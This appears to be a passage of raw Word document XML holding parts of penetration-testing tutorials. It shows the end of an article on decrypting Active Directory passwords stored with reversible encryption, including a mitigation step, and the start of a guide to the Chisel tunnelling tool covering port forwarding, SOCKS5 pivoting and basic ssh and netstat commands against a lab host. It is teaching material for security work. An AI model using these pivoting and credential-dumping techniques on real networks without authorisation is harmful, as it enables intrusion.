          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ensure that Allow Reversible Password Encryption property is set to disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BDD027" w14:textId="77777777" w:rsidR="00523D79" w:rsidRPr="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Group policy store password using reversible encryption is set to disable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D58E72F" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB5CB10" w14:textId="11ABF1FE" w:rsidR="00523D79" w:rsidRDefault="00523D79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>we were able to decrypt the password of active directory user accounts. This article can serve as a reference for Red Team activists for Credential Dumping – Active Directory Plain Text Password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E23B874" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4129E8FF" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4294597E" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5A0C4D" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A Detailed Guide on Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317AE095" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Background of Port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5206837A" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Port forwarding in a computer network, also known as port mapping of network address transition (NAT), redirects a communication request from one address and port number combination to another while packets traverse a network gateway such as a firewall or a router. It is used to keep unwanted traffic off. A network administrator uses one IP address for all external communications on the internet while dedicating multiple servers with different IPS and ports internally to do various tasks based on organization requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEEC6DF" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Table of content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095033E7" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Introduction to Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E3E50E" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish a connection with the remote </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15D73683" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Local port forwarding Example – 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52ECB1" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Local Port forwarding Example – 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F4FD8" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Establish Connection with SOCKS5 Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B6C997" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure SOCKS5 in proxychains4.conf </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C608192" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Banner grabbing of the remote host with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D577E1A" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet Connection using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="608D90E6" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP connection using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="31FC9F26" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">VNC Viewer connection using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4372353E" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F716D75" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Introduction to Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D80E47E" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Chisel is open-sourced tool written in Go (Golang) language, mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. It is a fast TCP/UDP tunnel, transported over HTTP and secured via SSH. In addition, it requires two things to establish a connection between a remote host and the attacking box, where the attacking box will act as the server and the remote host as a client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA7816" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish a connection with the remote </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="066DB452" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">We are establishing a connection with the remote host with valid credentials. The remote host can be a target and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> point for the next hop. If there is another </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>hop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can connect with, then the remote host will act as a routing point. We connected as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> user with the host using SSH protocol which stands for secure socket shell and transmits data in encrypted form. Once we connect with the remote host, we will view the internal network status, which can be achieved using the following commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB567A" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>-a all interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2151FF" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-n show </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02538F03" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-t show </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA224CE" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>-p show process id/name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196ACDF4" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> pentest@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BCF53" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>antp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FFD7A26" w14:textId="71D2A739" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DC998B8" wp14:editId="2C9BD8A3">
            <wp:extent cx="5731510" cy="480250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4802505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43B2DD" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62317E75" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Chisel installation is straightforward in Kali Linux as it comes with a distribution package. We can install it using the below command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCD34DC" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
